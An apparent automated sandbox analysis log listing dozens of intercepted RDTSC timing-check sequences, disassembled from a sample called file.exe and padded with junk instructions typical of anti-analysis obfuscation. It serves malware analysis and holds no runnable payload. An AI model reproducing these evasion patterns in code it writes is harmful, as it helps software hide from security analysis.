Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBFF5 second address: 9FBFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC10E second address: 9FC133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e jg 00007F1A796F3548h 0x00000014 pop edi 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC133 second address: 9FC142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F1A796B9BECh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC142 second address: 9FC150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC150 second address: 9FC155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC155 second address: 825C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jp 00007F1A796F354Dh 0x00000011 jnp 00007F1A796F3547h 0x00000017 push dword ptr [ebp+122D07F1h] 0x0000001d jnp 00007F1A796F3561h 0x00000023 call dword ptr [ebp+122D1BC7h] 0x00000029 pushad 0x0000002a jmp 00007F1A796F354Ch 0x0000002f xor eax, eax 0x00000031 mov dword ptr [ebp+122D246Eh], ebx 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b clc 0x0000003c mov dword ptr [ebp+122D3B1Dh], eax 0x00000042 mov dword ptr [ebp+122D28CCh], eax 0x00000048 mov esi, 0000003Ch 0x0000004d mov dword ptr [ebp+122D28CCh], ecx 0x00000053 jmp 00007F1A796F354Ah 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c jmp 00007F1A796F3550h 0x00000061 lodsw 0x00000063 jnl 00007F1A796F354Ch 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jns 00007F1A796F354Ch 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 pushad 0x00000078 js 00007F1A796F3548h 0x0000007e pushad 0x0000007f popad 0x00000080 and edi, dword ptr [ebp+122D3AB9h] 0x00000086 popad 0x00000087 nop 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D1A second address: A01D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D20 second address: A01D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D2F second address: A01D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F1A796B9BE6h 0x00000009 jmp 00007F1A796B9BECh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 je 00007F1A796B9BE6h 0x00000016 popad 0x00000017 jmp 00007F1A796B9BF5h 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pushad 0x0000001f jmp 00007F1A796B9BF5h 0x00000024 push eax 0x00000025 push edx 0x00000026 jnp 00007F1A796B9BE6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D82 second address: A01D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D86 second address: A01D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D8F second address: A01DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1A796F3546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01DA0 second address: A01DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01DA4 second address: A01DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02170 second address: A02177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A022C3 second address: A022C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02410 second address: A02414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02414 second address: A0241A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A093AC second address: A093B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07C95 second address: A07CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796F3557h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07CB3 second address: A07CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07CC1 second address: A07CD3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1A796F3546h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07CD3 second address: A07CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1A796B9BE6h 0x0000000a jmp 00007F1A796B9BF7h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07CF9 second address: A07CFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D32D9 second address: 9D32DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08808 second address: A08821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F1A796F3546h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08821 second address: A08825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08825 second address: A0882B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08961 second address: A0896E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007F1A796B9BECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0896E second address: A08972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08972 second address: A0897A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08AF3 second address: A08B1E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1A796F354Ah 0x00000008 jmp 00007F1A796F3557h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08CC3 second address: A08CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1A796B9BF8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08CE6 second address: A08CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0919C second address: A091A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A091A0 second address: A091A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A091A4 second address: A091B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A091B1 second address: A091B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A091B5 second address: A091F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BEBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F1A796B9BF4h 0x00000011 jmp 00007F1A796B9BF5h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A091F4 second address: A091FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DCC6 second address: A0DCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F1A796B9BF9h 0x0000000a pushad 0x0000000b jo 00007F1A796B9BE6h 0x00000011 jo 00007F1A796B9BE6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jo 00007F1A796B9BE6h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CB7E second address: A0CB94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F1A796F354Ch 0x00000010 jns 00007F1A796F3546h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CB94 second address: A0CBB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D86CE second address: 9D86D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D89DE second address: 9D89E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D89E2 second address: 9D89E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D89E8 second address: 9D89EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D89EE second address: 9D89F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8C9B second address: 9D8CC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1A796B9BF0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8D17 second address: 9D8D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F1A796F354Ah 0x0000000d push esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop esi 0x00000011 xchg eax, esi 0x00000012 js 00007F1A796F3566h 0x00000018 call 00007F1A796F3559h 0x0000001d or dword ptr [ebp+12451200h], edx 0x00000023 pop edx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F1A796F3552h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8D68 second address: 9D8D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BF6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8D82 second address: 9D8D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8F85 second address: 9D8F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8F89 second address: 9D8F8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9074 second address: 9D9082 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9082 second address: 9D9088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D93BE second address: 9D93D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BF3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D93D5 second address: 9D93D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D96AA second address: 9D9708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1A796B9BF7h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f cmc 0x00000010 lea eax, dword ptr [ebp+12486208h] 0x00000016 jg 00007F1A796B9BEBh 0x0000001c call 00007F1A796B9BF9h 0x00000021 sub dword ptr [ebp+12462EE6h], esi 0x00000027 pop edx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jo 00007F1A796B9BE6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9708 second address: 9D971F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CE88 second address: A0CE96 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F1A796B9BE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CE96 second address: A0CEAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1A796F354Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CFFD second address: A0D010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edi 0x0000000a je 00007F1A796B9BE6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D195 second address: A0D1A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D1A5 second address: A0D1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D479 second address: A0D49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796F3554h 0x00000009 popad 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F1A796F3546h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D707 second address: A0D718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1A796B9BE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D890 second address: A0D8A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D8A9 second address: A0D8B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D8B1 second address: A0D8B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D8B7 second address: A0D8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1703E second address: A17042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15C92 second address: A15CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BECh 0x00000009 popad 0x0000000a push esi 0x0000000b jbe 00007F1A796B9BE6h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15CAF second address: A15CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15CB3 second address: A15CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1A796B9BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F1A796B9BF8h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F1A796B9BE6h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15CE3 second address: A15D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3558h 0x00000007 jnl 00007F1A796F3546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15F97 second address: A15F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15F9B second address: A15FD3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1A796F3546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F1A796F3546h 0x00000011 jbe 00007F1A796F3546h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 jmp 00007F1A796F354Ah 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 jmp 00007F1A796F354Bh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1642C second address: A16432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A159C4 second address: A159C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A159C8 second address: A159D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A159D1 second address: A159E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796F354Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A159E4 second address: A159E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A159E9 second address: A15A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1A796F3552h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15A01 second address: A15A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F1A796B9BFAh 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jnl 00007F1A796B9BE6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1673E second address: A16747 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A16747 second address: A1675C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1A796B9BE6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F1A796B9BF9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1675C second address: A1677D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796F354Dh 0x00000009 jmp 00007F1A796F3550h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A16A2C second address: A16A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BEEh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F1A796B9BEFh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993F4C second address: 993F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993F52 second address: 993F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F1A796B9BE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
